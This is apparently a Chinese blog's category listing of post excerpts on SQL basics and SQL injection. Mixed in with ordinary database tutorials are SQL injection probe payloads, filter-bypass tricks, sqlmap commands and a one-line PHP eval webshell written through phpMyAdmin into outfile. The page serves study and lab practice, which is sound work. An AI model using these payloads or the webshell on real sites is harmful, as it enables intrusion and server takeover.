随笔分类 - SQL/SQL防护
摘要:php匹配关键字跳转页面 strstr函数搜索要从目标字符串中搜索的字符串;strstr函数仅用于检查字符串是否存在;strstr函数的用法如下。 <?php name=name,$b)){ //echo "111111"; /
阅读全文
摘要:SQL注入__布尔盲注和时间盲注 布尔盲注 sql盲注二分法注入脚本 猜测数据库 ?id=1' and length(database())=8-- - ?id=1' and length(database())>8-- - 当前数据库第一位 截取数据库第一位 通过Ascii码值比较 id=1' a
阅读全文
摘要:sql盲注二分法注入脚本 此脚本可以用来检测sql靶场第五关 http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1 手工注入 布尔盲注和时间盲注 猜测数据库 ?id=1' and length(database())=8-- - id=1' a
阅读全文
摘要:sqlmap使用手册 练习 基础命令:参考 输入“python sqlmap.py --version”检查sqlmap是否安装成功 输入“python sqlmap.py -hh”, “-hh”参数用于查看sqlmap的使用说明 输入“python sqlmap.py -u "http://192
阅读全文
摘要:数据库的操作02 SQL语言 SQL 1.什么是SQL ? Structured Query Languange:结构化查询语言 其实就是定义了操作所有关系型数据库的规则。每一种数据库操作的方式存在不一样的地方,称为“方言”。 2.SQL通用语法 SQL语句可以单行或多行书写,以分号结尾。 可使用空
阅读全文
摘要:数据库学习记录 数据库的位置和地位 数据库种类 数据库简介 SQL 是用于访问和处理数据库的标准的计算机语言。 SQL (Structured Query Language:结构化查询语言) 是用于管理关系数据库管理系统(RDBMS)。 SQL 的范围包括数据插入、查询、更新和删除,数据库模式创建和
阅读全文
摘要:通过phpMyAdmin写入MySQL,获取webshell 在SQL的控制台中输入 进入http://127.0.0.1/phpMyAdmin,并在SQL中输入如下命令 select '<?php @eval($_POST[1]);?>' into outfile 'D:/phpstudy_pro
阅读全文
摘要:SQL注入绕过总结 mysql手工注入方法 ?id=1%df’(测试是否存在注入,报错则存在) ?id=1%df’-- -(注释后面多余的’limit 0,1 页面正常) ?id=1%df’order by n-- -(order测试字段长度,报错则说明超出最大长度) ?id=-1%df’union
阅读全文
摘要:SQL注入常见函数 首先SQL语句对大小写不敏感,这也导致了后台程序对大小写的检测失效。 SQL 注释语句 ("--"与"/*...*/") (1)--:表示单行注释 (2)/*…*/:用于多行(块)注释 SELECT 查询语句 SQL SELECT 语法 SELECT 列名称 FROM 表名称 S
阅读全文
摘要:Mysql一套完整练习题 练完这一套题,你的Mysql就算入门了; 测试表格 --1.学生表 Student(S#,Sname,Sage,Ssex) --S# 学生编号,Sname 学生姓名,Sage 出生年月,Ssex 学生性别 --2.课程表 Course(C#,Cname,T#) --C# -
阅读全文
摘要:MySQL5.5默认的四个数据库用途 INFORMATION_SCHEMA 数据库INFORMATION_SCHEMA:提供了访问数据库元数据的方式。 元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。换句换说,in
阅读全文
摘要:盲注时绕过过滤方法 一、=被过滤 1、可以使用通配符like或者REGEXP 比如想要查询id为8的数据一般会使用select * from users where id=8; 等于被过滤的话可以使用 或者<、> 或者!(<>)不不等于 使用between 二、引号被过滤 使用十六进制 把单引号的内
阅读全文
摘要:第一次安装SQL Server 2008 无法连接到(local)问题 初次安装使用SQL server 2008时,可能会遇到无法连接到(local)的情况。 如何解决SQL Server 2008 无法连接到(local) 打开SQL server 配置管理器-->SQL server 网络配置
阅读全文
摘要:mysql基本命令 mysql基本命令 mysql远程连接 1.打开cmd窗口,进入MySql安装的bin目录 2.执行命令登录数据库,之后会出现一行要你输入密码的mysql -u root -p 3.执行以下命令分配新用户:grant all privileges on *.* to '用户名'@
阅读全文
摘要:SQL注入相关知识整理 4.1 mysql手工注入方法 4.2 mysql手工注入命令顺序... 4.3 报错注入 4.4 布尔注入 4.5 (宽字节注入)大碗宽面 4.6 盲注 4.7 时间盲注和union查询 4.8 延时注入 4.9 注入读文件 写shell操作... SQL注入基础 什么是S
阅读全文
摘要:数据库知识总结 本节内容 1.数据库的基本概念 2.MySQL数据库软 安装 卸载 配置 3.SQL 数据库的基本概念 1.数据库的英文单词:DataBase 简称:DB2.什么是数据库? 用于存储和管理数据的仓库 3.数据库的特点: 持久化存储数据。其实数据库就是一个文件系统 方便存储和管理数据
阅读全文
摘要:DCL:管理用户、授权 SQL分类: DDL:操作数据库和表 DML:增删改表中的数据 DQL:查询表中的数据 DCL:管理用户、授权 DBA:数据库管理员 DCL:管理用户、授权 1.管理用户 1.添加用户: 语法:CREATE USER '用户名'@'主机名' IDENTIFIED BY '密码
阅读全文
摘要:本节内容 1.多表查询 2.事务 多表查询: 查询语法 select 列名列表 from 表名列表 where ... 准备sql #创建部门表 CREATE TABLE dept(); #创建员工表 CREATE TABLE emp(); 笛卡尔积:有两个集合A,B,去这两个集合的所有组成情况.要
阅读全文
